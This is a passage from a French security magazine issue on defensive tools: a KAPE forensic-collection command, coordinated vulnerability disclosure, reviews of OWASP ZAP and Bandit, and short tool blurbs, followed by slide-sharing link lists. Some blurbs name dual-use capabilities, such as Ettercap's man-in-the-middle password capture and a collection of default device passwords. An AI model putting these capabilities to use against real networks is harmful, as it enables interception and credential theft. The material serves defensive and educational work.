première phase et qui génèrent en sortie des fichiers exploitables pour l’investigation (txt, csv, etc.). La configuration KAPE devrait être prête avant qu’un incident ne se produise. Une fois le logiciel téléchargé – typiquement sur un disque externe ou un disque réseau –, commencez par mettre à jour les modules en lançant gkape.exe et sélectionnez l’option en bas “Sync with Github”. Ensuite, téléchargez et placez dans “bin/annuire” les outils manquants (ex. : message d’erreur winPmem lors de la phase de lance- ment du test – Cannot find executable “winpmem.exe”), le lien vers l’outil est fourni dans les templates KAPE pour les targets/méthodes (champ : BinaryUrl). Une attaque a eu lieu ! Exécutez la commande suivante en tant qu’ad- ministrateur pour récupérer des artefacts : JAROSŁAW OPARKA | CSIRT Reverse Engineer, Atos kape.exe --tsource C: --tdest kape_%m_output --tflush --target WindowsDefender,WebBrowsers,$MFT,Amcache,EventLogs,- FileSystem,LnkFilesAndJumpLists,LogFiles,Prefetch, RegistryHives,WindowsTimeline --zip archive --mdest kape_%m_outputmodules --mflush --module BrowsingHis- toryView,MFTECmd,ARPCache,autoruns,DNSCache,han- dle,IPConfig,NetStat,ProcessDetails,qwinsta,SystemInfo,WinP- mem,TaskScheduler,RegRipper-ALL --zpw very_long_secure_password L A T R O U S S E À O U T I L S
_10 / _11_Cyberun#12 La divulgation coordonnée de vulnérabilités (CVD) est le processus permettant une collaboration entre un hacker éthique et le responsable du SI. Les hackers éthiques peuvent significativement contribuer à accroître la sécurité numérique. Toutefois, le “premier contact” est souvent difficile à établir. De plus, même lorsqu’une vulnérabilité est signalée, les responsables du SI affecté peuvent préférer ne pas en tenir compte. Ce silence pousse à la divulgation publique, moyen de faire pression pour faire corriger la vulnérabilité. ZeroDisclo.com est une plateforme non partisane et gratuite, opérée par Yes We Hack, qui permet de signaler des vulnérabilités tout en gardant l’anonymat. Grâce à ZeroDisclo, la divulgation peut également se faire via le navigateur Tor. Lors de la rédaction, le hacker éthique choisit de laisser des coordonnées de contact. Quel que soit le navigateur utilisé, le rapport est chiffré avec la clé publique de l’organisation réceptrice (telle qu’un CERT privé ou national), puis signé et horodaté par une blockchain. Le site envoie le rapport, et le hacker signa- lant la vulnérabilité reçoit un certifi- cat en guise de preuve de dépôt. ZeroDisclo.com formalise le rap- port, notamment via différents critères permettant le calcul du score de sévérité CVSS. Plus important encore, le chiffrement du rapport assure que ZeroDisclo.com fait seulement office de “courroie de transmission”, et non de base de données de vulnérabilités. À aucun moment, la plateforme ou les individus qui l’administrent n’accèdent aux détails de la vulnérabilité décrite. Ce fonctionnement permet de faciliter la divulgation coordonnée de vulnérabilités, sans que ZeroDisclo.com n’ait à engranger une connaissance dangereuse des défaillances affectant les systèmes d’information de tiers. La confidentialité des informations sur le potentiel risque de sécurité est assurée ; l’intégrité du rapport l’est tout autant, grâce au chiffrement et à l’horodatage blockchain. Les enjeux de la divulgation coordonnée de vulnérabilités Lorsque les acteurs malveillants sont les seuls informés d’une vulnérabilité ou ont un avantage chronologique, le risque numérique augmente pour tous, notamment si les vulnérabilités ont des répercussions importantes. L’adoption de politiques de divulgation coordonnée a ainsi des bénéfices significatifs pour les parties prenantes : montée en maturité de la sécurité, développement de talents au sein des organisations et autonomie technologique de par la maîtrise renforcée des risques numériques liés à la gestion des vulnérabilités. La divulgation de vulnérabilités est un processus, et non un événement. Elle implique aussi une montée en maturité car elle requiert de comprendre, cartogra- phier, structurer, responsabiliser et de rendre opérant un processus, où les rôles et responsabilités des actifs numériques sont clairement identifiés et endossés. Le cycle de vie d’une vulnérabilité décrit les différents événements susceptibles de l’affecter et d’influencer le niveau de risque pour les utilisateurs, mais aussi la nécessité d’action de la part des différentes parties prenantes. En outre, une vulnérabilité découverte est susceptible d’être redécouverte dans un délai relative- ment court. Ces périodes déterminent les phases de variation de l’exposition aux risques. À cette notion de variation avec le cycle de vie de la vulnérabilité s’ajoutent les appétences différentes au risque. Il est donc primordial de maîtriser, autant que possible, le chaînon fondamental de la divulgation, afin de garantir la connaissance restreinte de l’existence et l’impact potentiel de la vulnérabilité. RAYNA STAMBOLIYSKA | VP Gouvernance et affaires publiques, Yes We Hack _11 : Divulgation coordonnée de vulnérabilités ZERODISCLO.COM De la qualité du code de vos applicatifs (sites web, développements “maison”, etc.) dépend essentiellement leur sécurité. Que faire pour la renforcer et comment gérer les vulnérabilités ? AMÉLIORER LES APPLICATIONS _12 Outil DAST (Dynamic Application Security Testing), il vise à tester la sécurité d’un site web selon son comportement dynamique. Développé par la vénérable organisation OWASP, ZAP dispose d’une communauté impressionnante. Avec 85 000 télé- chargements par mois, c’est l’un des outils de sécurité open source les plus populaires. Son interface graphique est datée, mais simple et efficace. La docu- mentation est très complète, et on trouve d’excellentes ressources sur Internet pour s’initier rapidement à ZAP et l’intégrer dans de nombreux environnements (par exemple sur Azure). Ecrit en Java, ZAP est multiplateforme (Windows/Linux/MacOS), ne nécessite pas d’installation (si l’environnement Java est déjà installé), se lance sans aucune difficulté et s’avère très fiable. Le mode automatique est particulièrement pratique pour obtenir rapidement l’intégration dans une chaîne CI/CD. ZAP intègre un module capable de trouver automatiquement les différentes URL d’un site. Si certaines alertes correspondent à des faux positifs, il est souvent judicieux de les prendre en compte et de faire évoluer son design pour les éviter. Pour les pentesters, le mode manuel permet de mener des attaques sophistiquées. Le lancement automatique d’un navigateur préconfi- guré est particulièrement appréciable. Le mode “request editor” permet de facilement personnaliser une requête initialement faite par le navigateur. L’outil conserve la trace de toutes les connexions, ce qui est très pratique pour revenir sur ce que l’on a fait (comme git pour un développeur). ZAP intègre un magasin d’extensions. On en trouve notamment pour l’intégration à Jenkins, pour le standard OpenAPI, pour SAML, etc. On peut également développer des extensions “maison” en Java, et même intégrer ZAP dans un programme Python (package python- owasp-zap) ! Site : https://www.zaproxy.org/ _13 Bandit est un outil SAST (Static Application Security Testing). Cela consiste à analyser le code source dans sa forme d’origine pour détecter des éventuelles formes de codage ou d’appels non sécurisés qui peuvent conduire à des failles (anti-patterns). Il est dédié au Python et peut compléter une analyse statique classique de type Linter pour couvrir les aspects sécuritaires. Initialement démarré par OpenStack, il a été repris par la communauté active PYCQA (Python Code Quality Authority). Son code source ouvert et gratuit permet d’étendre le jeu de “tests” au-delà des 70 existants, et de couvrir éventuellement plus de vulnérabilités (ex. : interdire une fonction, détecter le mode debug, etc.). L’outil peut se l a n ce r s u r u n répertoire de code Python. Il l’analyse en mode récursif, puis renvoie les résultats par criti- cité sur la ligne de commande, ou d a n s l ’u n d e s formats supportés p o u r d ’a u t r e s intégrations (html, csv, json, etc.). Naturellement, il peut retourner des faux positifs. Vous pouvez les gérer de différentes façons, avec précaution : en excluant des répertoires (de tests, par exemple), en ignorant certains tests à l’aide de skips, ou en annotant certaines lignes de code par le commentaire “#nosec”. Bandit est un outil simple, efficace et extensible, indispensable pour la sécurité du code Python. D’autres outils open source existent également en fonction des langages et frameworks utilisés. Site : https://github.com/PyCQA/bandit ABDERRHAMANE SMIMITE | Managing Director, Intuitem BANDIT Audit de sécurité “frugal” de code source La détection des vulnérabilités dans les chaînes CI/CD est devenue incontournable pour limiter les risques d’attaque sur les produits, services et API exposés. En effet, corriger un problème avant qu’il soit exploitable est bien plus rationnel qu’attendre une attaque pour réagir, d’autant plus si la démarche est automatisable. Par ailleurs, la cybersécurité n’échappe pas à la vague open source, a fortiori dans une période où les budgets sont sous pression. Dans le domaine du test de sécurité des applications, Bandit et ZAP sont des produits open source particulièrement populaires, seuls ou en compléments d’outils commerciaux plus ambitieux. Nous apprécions en particulier leur capacité à être intégrés à des chaînes CI/CD et leur extensibilité. OWASP ZAP L A T R O U S S E À O U T I L S
Magnet Acquire : www.magnetforensics.com/resources Création d’images à fin forensique de smartphones (iOS/Android), disques durs et médias externes. Voir aussi sleuthkit.org. RIM (incident response methodologie) : github.com/certsocietegenerale/IRM Proposées par le CERT de la Société Générale, des fiches pratiques à utiliser pour mieux répondre aux incidents (à lire de préférence AVANT l’incident !). Infection monkey : github.com/guardicore/monkey Teste la résilience aux violations de périmètre et aux infections internes (pentesting automatisé) en utilisant différentes méthodes pour se propager à travers un datacenter. Lynis : cisofy.com/lynis Audite les serveurs sous Linux (et MacOS) afin d’en renforcer la sécurité (OS hardening) : contrôle des paramètres du noyau, des mécanismes d’authentification, de la journalisation... Peut utiliser, si nécessaire, les normes ISO 27001, PCI DSS ou HIPAA. Zed Attack Proxy : zaproxy.org Scanneur de vulnérabilités exclusivement dédié aux sites web (database Injection, cross site scripting injection, HTTP response splitting, .htaccess misconfigurations, shellshock, etc.). Voir aussi wapiti.sourceforge.io. Vuls : vuls.io Scanneur de vulnérabilités, utilisable en mode local ou distant, ne nécessitant pas l’installation d’agent. Permet le reporting grâce à vulsRepo. Cuckoo sandbox : cuckoosandbox.org Espace protégé et automatisé d’analyse de malwares : permet de qualifier un fichier suspect sans avoir besoin de l’envoyer dans le cloud (virustotal) et donc d’en préserver la confidentialité. Moloch : molo.ch Outil de capture de paquets réseaux, distribué à large échelle, permettant des recherches rapides (indexation). Ettercap : ettercap-project.org Intercepte le trafic réseau, permet de réaliser des attaques Man In The Middle, de récupérer des mots de passe sur HTTP, FTP et certains protocoles chiffrés. Peut être utilisé en complément de PassHunt (github.com/Viralmaniar), qui regroupe tous les mots de passe par défaut des équipements. Kismet : kismetwireless.org Détecteur passif de réseaux sans fil, détermine les points d’accès et les clients WiFi, détecte les sniffeurs actifs (NetStumbler), ainsi que les intrusions WiFi, bluetooth et d’autres protocoles sans fil (utilise alors un dongle SDR). 10 autres outils proposés par nos experts Le magazine Cyberun est un bimestriel édité par Cyberun, association loi 1901. Boîte 81, 206 quai de Valmy, 75010 Paris. Directrice de publication : Hélène Windish Rédacteur en chef : Stéphane Darget Look at Sciences a participé à ce numéro Création et maquette : www.rodolpherrera.fr ISSN : 2677-5964. Toute reproduction, traduction, reproduction intégrale ou partielle est interdite, sans l’autorisation écrite de Cyberun, sauf dans les cas prévus par l’article L122-5 du Code de la propriété intellectuelle. En tant qu’abonné au magazine, vous êtes autorisé à imprimer votre exemplaire. Prix au numéro (imprimé et expédié) : 25 € Les grognements de Cy Visiblement, je ne mets pas assez les pattes à la pâte. Résultat, je me les suis fait prendre dans le honeypot, comme un ourson bleu dans le pot de miel : comme il n’était pas question de rester à hiberner tout l’été, je devais à l’arrache mettre en place une solution de télépêche de saumon. Après un délicieux repas, j’ai choisi BearIot (qui, malgré son nom, était totalement immonde*) et pondu un excellent rapport. Mais... cette solution s’est avérée coûteuse, inefficace et, en fait, une resucée d’un vieux projet open source. Je vous passe les remontrances du Grand Chef, qui lui, évidemment, ne fait que papoter et arrive quand même à enchaîner les bourdes. OK, les tableaux de bord et les référentiels, c’est utile... Mais si j’avais un peu plus écouté Emma, la geekette, qui m’avait bien parlé d’un truc, et suivi ce MOOC technique sur les IoT... *(NdT : “to be a riot” : être génial, irrésistible) Qui sommes-nous ? Cyberun est un magazine totalement indépendant, édité par financement participatif. Il fédère une large communauté d’acteurs de la cybersécurité qui souhaitent partager leurs expertises et leurs expériences. Pour favoriser l’échange de connaissances et ne pas se contenter d’approximations, chaque numéro est dédié à un thème unique. Abonnez-vous gratuitement à Cyberun ! Recevez automatiquement le magazine en PDF en vous inscrivant sur cyberun.net et découvrez comment vous pouvez, vous aussi, participer à cette aventure ! Contactez-nous ! Pour diffuser ce magazine lors d’un événement, rejoindre la communauté, ou pour toute information complémentaire : www.cyberun.net (lien “Rejoignez la communauté !”) Cy-Bear, le gentil ours vivant en Alaska... Imprimez-moi ! Ne me jetez pas, partagez-moi !

Recommandé

DevSecOps : de la théorie à la pratique
DevSecOps : de la théorie à la pratiqueDevSecOps : de la théorie à la pratique
DevSecOps : de la théorie à la pratiquebertrandmeens
 
Opensource et AppSec : amis ou ennemis ?
Opensource et AppSec : amis ou ennemis ?Opensource et AppSec : amis ou ennemis ?
Opensource et AppSec : amis ou ennemis ?bertrandmeens
 
Cybersécurité des projets webs
Cybersécurité des projets websCybersécurité des projets webs
Cybersécurité des projets websChristophe Villeneuve
 
Le monitoring à l'heure de DevOps et Big Data
Le monitoring à l'heure de DevOps et Big DataLe monitoring à l'heure de DevOps et Big Data
Le monitoring à l'heure de DevOps et Big DataClaude Falguiere
 
DevOps et tendances Monitoring
DevOps et tendances MonitoringDevOps et tendances Monitoring
DevOps et tendances MonitoringFrançois
 
Analyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceAnalyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceSébastien GIORIA
 
Introduction à DevOps
Introduction à DevOpsIntroduction à DevOps
Introduction à DevOpsMicrosoft
 
L'analyse de code au service de la qualité
L'analyse de code au service de la qualitéL'analyse de code au service de la qualité
L'analyse de code au service de la qualitéStephane Leclercq
 

Recommandé

DevSecOps : de la théorie à la pratique
DevSecOps : de la théorie à la pratiqueDevSecOps : de la théorie à la pratique
DevSecOps : de la théorie à la pratiquebertrandmeens
 
Opensource et AppSec : amis ou ennemis ?
Opensource et AppSec : amis ou ennemis ?Opensource et AppSec : amis ou ennemis ?
Opensource et AppSec : amis ou ennemis ?bertrandmeens
 
Cybersécurité des projets webs
Cybersécurité des projets websCybersécurité des projets webs
Cybersécurité des projets websChristophe Villeneuve
 
Le monitoring à l'heure de DevOps et Big Data
Le monitoring à l'heure de DevOps et Big DataLe monitoring à l'heure de DevOps et Big Data
Le monitoring à l'heure de DevOps et Big DataClaude Falguiere
 
DevOps et tendances Monitoring
DevOps et tendances MonitoringDevOps et tendances Monitoring
DevOps et tendances MonitoringFrançois
 
Analyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceAnalyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceSébastien GIORIA
 
Introduction à DevOps
Introduction à DevOpsIntroduction à DevOps
Introduction à DevOpsMicrosoft
 
L'analyse de code au service de la qualité
L'analyse de code au service de la qualitéL'analyse de code au service de la qualité
L'analyse de code au service de la qualitéStephane Leclercq
 
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...Samir Arezki ☁
 
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...CEDRIC DERUE
 
Afterwork "Décollez vers le Cloud"
Afterwork "Décollez vers le Cloud"Afterwork "Décollez vers le Cloud"
Afterwork "Décollez vers le Cloud"OCTO Technology Suisse
 
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...devops REX
 
Afterwork Devops : vision et pratiques
Afterwork Devops : vision et pratiquesAfterwork Devops : vision et pratiques
Afterwork Devops : vision et pratiquesOCTO Technology Suisse
 
Paris Chaos Engineering Meetup #6
Paris Chaos Engineering Meetup #6Paris Chaos Engineering Meetup #6
Paris Chaos Engineering Meetup #6Christophe Rochefolle
 
Matinale DevOps / Docker
Matinale DevOps / DockerMatinale DevOps / Docker
Matinale DevOps / DockerZenika
 
Introduction au DevOps @SfPot 2014
Introduction au DevOps @SfPot 2014Introduction au DevOps @SfPot 2014
Introduction au DevOps @SfPot 2014Jonathan Martin
 
La sécurité applicative par le design
La sécurité applicative par le designLa sécurité applicative par le design
La sécurité applicative par le designChristophe Villeneuve
 
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...TelecomValley
 
CloudExpo Europe 2017 - DevOps entre client et fournisseur
CloudExpo Europe 2017 - DevOps entre client et fournisseurCloudExpo Europe 2017 - DevOps entre client et fournisseur
CloudExpo Europe 2017 - DevOps entre client et fournisseurLudovic Piot
 
Journée DevOps : La boite à outil d'une équipe DevOps
Journée DevOps : La boite à outil d'une équipe DevOpsJournée DevOps : La boite à outil d'une équipe DevOps
Journée DevOps : La boite à outil d'une équipe DevOpsPublicis Sapient Engineering
 
Keynote Azure
Keynote AzureKeynote Azure
Keynote AzureMicrosoft
 
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...TelecomValley
 
Comprendre la securite web
Comprendre la securite webComprendre la securite web
Comprendre la securite webChristophe Villeneuve
 
DU DEVOPS AU FASTLAB
DU DEVOPS AU FASTLABDU DEVOPS AU FASTLAB
DU DEVOPS AU FASTLABTREEPTIK
 
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011Henri Gomez
 
[devops REX 2016] Les impacts techniques et organisationnels liés à devops
[devops REX 2016] Les impacts techniques et organisationnels liés à devops [devops REX 2016] Les impacts techniques et organisationnels liés à devops
[devops REX 2016] Les impacts techniques et organisationnels liés à devopsdevops REX
 
Meetup DevOps / WebOps Nîmes 20161020
Meetup DevOps / WebOps Nîmes 20161020Meetup DevOps / WebOps Nîmes 20161020
Meetup DevOps / WebOps Nîmes 20161020NimeOps
 
Paris Chaos Engineering Meetup #2
Paris Chaos Engineering Meetup #2Paris Chaos Engineering Meetup #2
Paris Chaos Engineering Meetup #2Christophe Rochefolle
 
Fouille logiciel
Fouille logicielFouille logiciel
Fouille logicielserge sonfack
 
Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Aref Jdey
 

Contenu connexe

Tendances

Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...Samir Arezki ☁
 
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...CEDRIC DERUE
 
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...devops REX
 
Afterwork Devops : vision et pratiques
Afterwork Devops : vision et pratiquesAfterwork Devops : vision et pratiques
Afterwork Devops : vision et pratiquesOCTO Technology Suisse
 
Matinale DevOps / Docker
Matinale DevOps / DockerMatinale DevOps / Docker
Matinale DevOps / DockerZenika
 
Introduction au DevOps @SfPot 2014
Introduction au DevOps @SfPot 2014Introduction au DevOps @SfPot 2014
Introduction au DevOps @SfPot 2014Jonathan Martin
 
La sécurité applicative par le design
La sécurité applicative par le designLa sécurité applicative par le design
La sécurité applicative par le designChristophe Villeneuve
 
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...TelecomValley
 
CloudExpo Europe 2017 - DevOps entre client et fournisseur
CloudExpo Europe 2017 - DevOps entre client et fournisseurCloudExpo Europe 2017 - DevOps entre client et fournisseur
CloudExpo Europe 2017 - DevOps entre client et fournisseurLudovic Piot
 
Journée DevOps : La boite à outil d'une équipe DevOps
Journée DevOps : La boite à outil d'une équipe DevOpsJournée DevOps : La boite à outil d'une équipe DevOps
Journée DevOps : La boite à outil d'une équipe DevOpsPublicis Sapient Engineering
 
Keynote Azure
Keynote AzureKeynote Azure
Keynote AzureMicrosoft
 
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...TelecomValley
 
DU DEVOPS AU FASTLAB
DU DEVOPS AU FASTLABDU DEVOPS AU FASTLAB
DU DEVOPS AU FASTLABTREEPTIK
 
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011Henri Gomez
 
[devops REX 2016] Les impacts techniques et organisationnels liés à devops
[devops REX 2016] Les impacts techniques et organisationnels liés à devops [devops REX 2016] Les impacts techniques et organisationnels liés à devops
[devops REX 2016] Les impacts techniques et organisationnels liés à devopsdevops REX
 
Meetup DevOps / WebOps Nîmes 20161020
Meetup DevOps / WebOps Nîmes 20161020Meetup DevOps / WebOps Nîmes 20161020
Meetup DevOps / WebOps Nîmes 20161020NimeOps
 

Tendances (20)

Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
Tech days2015 cedricderue_samirarezki_approche_devops_pour_builder_une_soluti...
 
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
Microsoft TechDays Tour 2015 - Approche DevOps Open Source pour les applicati...
 
Afterwork "Décollez vers le Cloud"
Afterwork "Décollez vers le Cloud"Afterwork "Décollez vers le Cloud"
Afterwork "Décollez vers le Cloud"
 
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
devops REX 2018 - Faire du DevOps dans une relation contractuelle et commerci...
 
Afterwork Devops : vision et pratiques
Afterwork Devops : vision et pratiquesAfterwork Devops : vision et pratiques
Afterwork Devops : vision et pratiques
 
Paris Chaos Engineering Meetup #6
Paris Chaos Engineering Meetup #6Paris Chaos Engineering Meetup #6
Paris Chaos Engineering Meetup #6
 
Matinale DevOps / Docker
Matinale DevOps / DockerMatinale DevOps / Docker
Matinale DevOps / Docker
 
Introduction au DevOps @SfPot 2014
Introduction au DevOps @SfPot 2014Introduction au DevOps @SfPot 2014
Introduction au DevOps @SfPot 2014
 
La sécurité applicative par le design
La sécurité applicative par le designLa sécurité applicative par le design
La sécurité applicative par le design
 
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
 
CloudExpo Europe 2017 - DevOps entre client et fournisseur
CloudExpo Europe 2017 - DevOps entre client et fournisseurCloudExpo Europe 2017 - DevOps entre client et fournisseur
CloudExpo Europe 2017 - DevOps entre client et fournisseur
 
Journée DevOps : La boite à outil d'une équipe DevOps
Journée DevOps : La boite à outil d'une équipe DevOpsJournée DevOps : La boite à outil d'une équipe DevOps
Journée DevOps : La boite à outil d'une équipe DevOps
 
Keynote Azure
Keynote AzureKeynote Azure
Keynote Azure
 
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
 
Comprendre la securite web
Comprendre la securite webComprendre la securite web
Comprendre la securite web
 
DU DEVOPS AU FASTLAB
DU DEVOPS AU FASTLABDU DEVOPS AU FASTLAB
DU DEVOPS AU FASTLAB
 
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
DevOps - Retour d'expérience - MarsJug du 29 Juin 2011
 
[devops REX 2016] Les impacts techniques et organisationnels liés à devops
[devops REX 2016] Les impacts techniques et organisationnels liés à devops [devops REX 2016] Les impacts techniques et organisationnels liés à devops
[devops REX 2016] Les impacts techniques et organisationnels liés à devops
 
Meetup DevOps / WebOps Nîmes 20161020
Meetup DevOps / WebOps Nîmes 20161020Meetup DevOps / WebOps Nîmes 20161020
Meetup DevOps / WebOps Nîmes 20161020
 
Paris Chaos Engineering Meetup #2
Paris Chaos Engineering Meetup #2Paris Chaos Engineering Meetup #2
Paris Chaos Engineering Meetup #2
 

Similaire à Cyberun #12

Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Aref Jdey
 
Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Aref Jdey
 
Business modèles pour l'Open Source
Business modèles pour l'Open SourceBusiness modèles pour l'Open Source
Business modèles pour l'Open Sourcealaprevote
 
La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...
La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...
La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...Softchoice Corporation
 
Sécurisation d'un site internet
Sécurisation d'un site internetSécurisation d'un site internet
Sécurisation d'un site internetwaggaland
 
Introduction à Linux et aux logiciels libres
Introduction à Linux et aux logiciels libresIntroduction à Linux et aux logiciels libres
Introduction à Linux et aux logiciels libresBruno Cornec
 
Atelier hadoop-single-sign-on
Atelier hadoop-single-sign-onAtelier hadoop-single-sign-on
Atelier hadoop-single-sign-onsahar dridi
 
MISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptx
MISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptxMISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptx
MISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptxPriscilleGANKIA
 
Mon Cloud - Présentation des services
Mon Cloud - Présentation des servicesMon Cloud - Présentation des services
Mon Cloud - Présentation des servicesGARRIDOJulien
 
Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...
Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...
Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...Everteam
 
Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...
Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...
Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...Rational_France
 
Rational France livre blanc - choisir le bon outil pour faire du bon travail
Rational France livre blanc - choisir le bon outil pour faire du bon travailRational France livre blanc - choisir le bon outil pour faire du bon travail
Rational France livre blanc - choisir le bon outil pour faire du bon travailRational_France
 
Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...
Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...
Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...CCI 21
 
Sécurité informatique - 10 erreurs à ne pas commettre
Sécurité informatique - 10 erreurs à ne pas commettreSécurité informatique - 10 erreurs à ne pas commettre
Sécurité informatique - 10 erreurs à ne pas commettreNRC
 
Galtier Concilier securite et simplicite
Galtier Concilier securite et simpliciteGaltier Concilier securite et simplicite
Galtier Concilier securite et simpliciteAntoine Vigneron
 

Similaire à Cyberun #12 (20)

Fouille logiciel
Fouille logicielFouille logiciel
Fouille logiciel
 
Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?
 
Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?Le logiciel libre est-il soluble dans l'économie marchande?
Le logiciel libre est-il soluble dans l'économie marchande?
 
Jusqu’ou iront les weblogs?
Jusqu’ou iront les weblogs?Jusqu’ou iront les weblogs?
Jusqu’ou iront les weblogs?
 
Business modèles pour l'Open Source
Business modèles pour l'Open SourceBusiness modèles pour l'Open Source
Business modèles pour l'Open Source
 
La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...
La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...
La face cachée de l'informatique d'entreprise: Une étude de Softchoice sur ...
 
OWF12/Security and Free Software
OWF12/Security and Free SoftwareOWF12/Security and Free Software
OWF12/Security and Free Software
 
